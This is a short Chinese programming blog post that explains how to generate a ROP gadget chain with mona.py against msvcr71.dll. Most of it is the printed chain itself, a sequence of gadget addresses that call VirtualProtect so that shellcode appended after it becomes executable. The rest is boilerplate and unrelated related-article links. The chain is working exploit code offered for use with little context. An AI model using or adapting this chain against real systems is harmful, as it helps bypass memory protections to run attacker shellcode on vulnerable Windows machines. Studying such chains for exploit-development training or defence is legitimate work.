rop_gadgets使用方法

2024-03-29 08:48
文章标签 使用 方法 rop gadgets

本文主要是介绍rop_gadgets使用方法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

利用mona.py可以生成

!mona rop -m msvcr71.dll -n

这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了

rop_gadgets =
[
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # Make EAX readable            
    0x7c37591f,    # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
    0x41414141,    # EBP (filler)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # <- *&VirtualProtect()
    0x7c3530ea,    # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
    0x7c346c0b,    # Slide, so next gadget would write to correct stack location
    0x7c376069,    # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
    0x41414141,    # EDI (filler)
    0x41414141,    # will be patched at runtime (VP), then picked up into ESI
    0x41414141,    # EBX (filler)
    0x7c376402,    # POP EBP # RETN (msvcr71.dll)
    0x7c345c30,    # ptr to 'push esp #  ret ' (from MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0xfffffdff,    # size 0x00000201 -> ebx, modify if needed
    0x7c351e05,    # NEG EAX # RETN (MSVCR71.dll)
    0x7c354901,    # POP EBX # RETN (MSVCR71.dll)
    0xffffffff,    # pop value into ebx
    0x7c345255,    # INC EBX # FPATAN # RETN (MSVCR71.dll)
    0x7c352174,    # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
    0x7c34d201,    # POP ECX # RETN (MSVCR71.dll)
    0x7c38b001,    # RW pointer (lpOldProtect) (-> ecx)
    0x7c34b8d7,    # POP EDI # RETN (MSVCR71.dll)
    0x7c34b8d8,    # ROP NOP (-> edi)
    0x7c344f87,    # POP EDX # RETN (MSVCR71.dll)
    0xffffffc0,    # value to negate, target value : 0x00000040, target: edx
    0x7c351eb1,    # NEG EDX # RETN (MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x90909090,    # NOPS (-> eax)
    0x7c378c81,    # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
    # rop chain generated with mona.py
].pack("V*")

这篇关于rop_gadgets使用方法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/858155

相关文章

使用Python实现快速搭建本地HTTP服务器

《使用Python实现快速搭建本地HTTP服务器》:本文主要介绍如何使用Python快速搭建本地HTTP服务器,轻松实现一键HTTP文件共享,同时结合二维码技术,让访问更简单,感兴趣的小伙伴可以了... 目录1. 概述2. 快速搭建 HTTP 文件共享服务2.1 核心思路2.2 代码实现2.3 代码解读3.

Elasticsearch 在 Java 中的使用教程

《Elasticsearch在Java中的使用教程》Elasticsearch是一个分布式搜索和分析引擎,基于ApacheLucene构建,能够实现实时数据的存储、搜索、和分析,它广泛应用于全文... 目录1. Elasticsearch 简介2. 环境准备2.1 安装 Elasticsearch2.2 J

使用C#代码在PDF文档中添加、删除和替换图片

《使用C#代码在PDF文档中添加、删除和替换图片》在当今数字化文档处理场景中,动态操作PDF文档中的图像已成为企业级应用开发的核心需求之一,本文将介绍如何在.NET平台使用C#代码在PDF文档中添加、... 目录引言用C#添加图片到PDF文档用C#删除PDF文档中的图片用C#替换PDF文档中的图片引言在当

Java中的String.valueOf()和toString()方法区别小结

《Java中的String.valueOf()和toString()方法区别小结》字符串操作是开发者日常编程任务中不可或缺的一部分,转换为字符串是一种常见需求,其中最常见的就是String.value... 目录String.valueOf()方法方法定义方法实现使用示例使用场景toString()方法方法

Java中List的contains()方法的使用小结

《Java中List的contains()方法的使用小结》List的contains()方法用于检查列表中是否包含指定的元素,借助equals()方法进行判断,下面就来介绍Java中List的c... 目录详细展开1. 方法签名2. 工作原理3. 使用示例4. 注意事项总结结论:List 的 contain

C#使用SQLite进行大数据量高效处理的代码示例

《C#使用SQLite进行大数据量高效处理的代码示例》在软件开发中,高效处理大数据量是一个常见且具有挑战性的任务,SQLite因其零配置、嵌入式、跨平台的特性,成为许多开发者的首选数据库,本文将深入探... 目录前言准备工作数据实体核心技术批量插入:从乌龟到猎豹的蜕变分页查询:加载百万数据异步处理:拒绝界面

Android中Dialog的使用详解

《Android中Dialog的使用详解》Dialog(对话框)是Android中常用的UI组件,用于临时显示重要信息或获取用户输入,本文给大家介绍Android中Dialog的使用,感兴趣的朋友一起... 目录android中Dialog的使用详解1. 基本Dialog类型1.1 AlertDialog(

Python使用自带的base64库进行base64编码和解码

《Python使用自带的base64库进行base64编码和解码》在Python中,处理数据的编码和解码是数据传输和存储中非常普遍的需求,其中,Base64是一种常用的编码方案,本文我将详细介绍如何使... 目录引言使用python的base64库进行编码和解码编码函数解码函数Base64编码的应用场景注意

使用Sentinel自定义返回和实现区分来源方式

《使用Sentinel自定义返回和实现区分来源方式》:本文主要介绍使用Sentinel自定义返回和实现区分来源方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Sentinel自定义返回和实现区分来源1. 自定义错误返回2. 实现区分来源总结Sentinel自定

Pandas使用SQLite3实战

《Pandas使用SQLite3实战》本文主要介绍了Pandas使用SQLite3实战,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学... 目录1 环境准备2 从 SQLite3VlfrWQzgt 读取数据到 DataFrame基础用法:读